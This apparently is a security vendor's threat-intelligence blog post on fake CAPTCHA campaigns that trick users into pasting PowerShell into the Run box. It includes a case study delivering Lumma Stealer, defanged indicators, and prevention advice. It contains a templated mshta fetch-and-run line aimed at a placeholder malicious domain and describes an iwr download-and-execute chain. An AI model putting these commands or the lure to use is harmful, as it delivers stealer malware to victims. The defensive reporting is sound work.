The Rise of Fake CAPTCHA Attacks 

Introduction 

Threat actors have been increasingly taking advantage of preexisting forms/requirements for users when trying to navigate throughout the web. By now, CAPTCHA prompts are commonplace, asking users to prove they are human by requesting the end user to pick certain pictures, solve problems, or click on something that only a human would successfully complete (See Figure 1). This typically grants the end user to continue onto the next part of whatever it is they were doing.  

But what if there was a way that this could be abused to infect the end user’s device and result in a compromise? Well, there is.  

This blog will discuss the Fake Captcha campaign, what Blackpoint’s Security Operations Center (SOC) has observed, and what you can do to help prevent a successful attack.  

Fake CAPTCHA On the Rise  

Threat actors have been leveraging users’ trust with newer tactics, techniques, and procedures (TTPs) to have the end user infect themselves with malware by tricking them into copying scripts and executing them via fake captcha prompts.  

Figure 1: Examples of CAPTCHAs 

Blackpoint’s SOC has observed an uptick in this type of campaign involving the use of social engineering to trick users into executing malware on their devices specifically using these fake captcha prompts. This is one way a threat actor can establish their foothold in an internal network. Threat actors can then use this access for further malicious activity, sell the access on the dark web, or provide access to other threat groups.  

There are multiple steps to this campaign, which are broken down below:  

• A user receives a phishing email or navigates to a compromised website.  
• The user is prompted with further instruction to prove they are “not a robot” (See Figure 1).  
• The user is often instructed to click a button with the phrase “I’m not a robot” or something similar (See Figure 2). 
• Once the button is clicked, it copies embedded code directly into the victim’s clipboard.  
• The user is instructed to open the run command and use “CTRL+v” to paste in the payload that was copied to the clipboard (See Figure 3). 
• The user is instructed to hit enter.   

These few simple steps convince the unsuspecting user to execute a command on their own system for the threat actor. What happens in the background is usually another 3-4 stage process, detailed below:  

• Once the payload is copied into the run command and the user presses enter, the victim is typically redirected to a sequence of URLs that result in additional payload deployment.  
• The first site often contains a PowerShell command that is used to execute a malicious .ps1 script that calls another site to fetch the final loader. 
• In all the observed incidents, the loader has been malicious and has delivered one of many different malware payloads, to include, Lumma Stealer, SocGholish, NetSupport RAT, AsyncRAT, Venom RAT, Xworm, and more.  

After this process is completed, there are multiple possibilities for threat actors. Many of the final payloads are sold as a service and have been tied to multiple ransomware operations indicating that a successful attack could have devastating impacts on a targeted organization. 

Figure 2: Example of “I’m not a robot” button 

Figure 3: Example of instructions to execute malicious commands 

Blackpoint’s SOC has successfully responded to more than 50 incidents involved in this campaign from December 2024 to March 2025. The frequency of these incidents has increased significantly over the last 30 days. These incidents have involved the deployment of at least eight different malware variants. The most commonly observed variant by Blackpoint SOC has been Lumma Stealer. Lumma Stealer is an information stealing malware that is sold as a service. This stealer has been actively observed since at least 2022, and targets information such as cryptocurrency wallets, credentials, and two-factor authentication browser extensions. 

Case Study: Legitimate Company Site Compromised 

Blackpoint’s SOC was alerted to suspicious PowerShell usage on two devices within the network of a Professional & Commercial Services (Business Services) partner. These PowerShell commands were indicative of the Fake CAPTCHA campaign and Blackpoint SOC isolated the impacted devices to prevent further malicious activity.  

Further investigation into the activity identified the following chain of events:  

• The command leveraged the PowerShell cmdlet “Invoke-WebRequest (iwr)” to download a PowerShell script, “34.ps1”, that executes in memory. The PowerShell script was hosted at irp[.]cdn-website[.]com; its main purpose was to download the next stage of the kill chain.  
• A successful execution of the script downloads a zip file, “Junction.zip”, and saves it as “a7wm.zip”, from a second domain, “shaileshvisionaryastrologer[.]com”. The zip file then gets extracted to the Temp folder.  
• The script then checks to see if the malicious binary was successfully extracted. If it was, the binary would be executed > the process would sleep for roughly 23 minutes > and the folder as well as the associated zip file would be deleted from the host.  
• The malicious payload in this incident was determined to be the Lumma Stealer malware. 
• The malicious commands have been observed being stored in the following Registry Key: Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU 

In this incident, further analysis of the overall incident by Blackpoint SOC identified that the victim received the fake CAPTCHA after visiting their own company’s legitimate WordPress site, indicating that this threat actor had likely compromised the legitimate site and was using it as a “watering hole” to trick users into falling for the fake CAPTCHA prompt.  

While the malware observed in these campaigns have been wide-ranging, one common observation in the majority of these incidents is the use of mshta, ““mshta https://<malicious.domain>/media.file #<comment>”. Blackpoint SOC has had detection rules in place for this type of tactic since early 2022. While the fake CAPTCHA portion of this campaign and the malware used may have evolved, threat actors continue to, and likely will continue to, revert to tried-and-true methods of execution over the next 12 months.  

Initial Access 

Threat actors likely compromised the companies own WordPress website and conducted a watering hole attack, which refers to a strategic web compromise typically on a site visited by a specific community, such as a specific vertical or region (MITRE ATT&CK: T1189).  

Once the victim visited the site, they were presented with a CAPTCHA, oftentimes a trusted verification process. When the victim completed the CAPTCHA and clicked the verify button, the PowerShell script that resulted in an alert was copied to the victim’s clipboard. The victim was then likely instructed to paste that script into the Windows Run Prompt.  

Once the script was executed (MITRE ATT&CK: T1059.001), Blackpoint SOC was alerted and the impacted devices were successfully isolated.   

Strong Prevention Through Awareness  

Once a threat actor gains access to a victim environment and malware is deployed, the possibilities are endless. Malware such as remote access trojans (RATs) as well as Information Stealers are common malware variants seen post compromise  

It is imperative that organizations ensure the proper security measures are in place and that employees understand how to identify and mitigate the risk that these type of threats create.  

The most effective method for preventing this type of incident is to implement proper security awareness to all users.  

Key Steps to Prevent:

1. Prior to interacting with a CAPTCHA prompt, ensure the website you’re visiting is the legitimate and intended website and that it has not been compromised.  
   • Basic rule of thumb, if the website does not align with the attempted activity, it is likely spoofed.  
   • The URL can be copied and pasted into several open-source intelligence (OSINT) websites, such as VirusTotal or Censys, to view the reputation of the website or IP address.  
2. In the event the user does interact with the CAPTCHA, any instructions to open a run command (Windows key+r) and paste something into it should be treated as likely malicious.  
   • Inform users to avoid following through with these steps and notify their organization’s security contact immediately.  
   • Execution via run does get logged in Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU 
     • We have seen malware clear these entries after execution 
3. Avoid opening emails from unknown senders and avoid opening unexpected attachments or links without verifying the legitimacy first.  
   • Ensure employees are aware of the process for reporting suspicious emails to their incident response or security teams.  
4. Avoid downloading cracked or purported “free” software; stick to legitimate marketplaces to avoid accidentally downloading malware with the software.  
5. Implement the practice of least privilege 
6. To the extent possible, limit direct call outs to external URLs and IP addresses 
   • We have seen these campaigns frequently rely on uncommon TLDs. 
7. Again, to the extent possible, limit the use of scripting languages, such as PowerShell.  
   • You can utilize our Managed Application Control to custom block mshta.exe commonly seen in these campaigns. 
8. Enable pop-up blockers to prevent one avenue of automatic download of malware.  
9. Ensure that proper security products are integrated into workstations and servers and that the alerts are being looked at by security professionals.  
   • In the case study above, Blackpoint SOC isolated these devices within 3 minutes of the alert. A “human-in-the-loop” approach is extremely important in making the difference between a successful compromise and an unsuccessful attempt.  
10. Implement a patch management program to ensure devices and software are kept up to date.  

Conclusion  

The malware variants that have been observed throughout this campaign have varied; however, the overall behavior within the campaign has remained relatively the same. These malware variants are sold as a service, making attribution to a specific threat actor difficult; however, pro-active intelligence driven security measures can help prevent this campaign from remaining successful.  

Blackpoint’s SOC has continuously identified and prevented this type of attack removing threat actors from compromised hosts; and will continue to take action and notify customers of new instances of the activity in the future.  

Author: Caden Toellner, Sr. MDR Analyst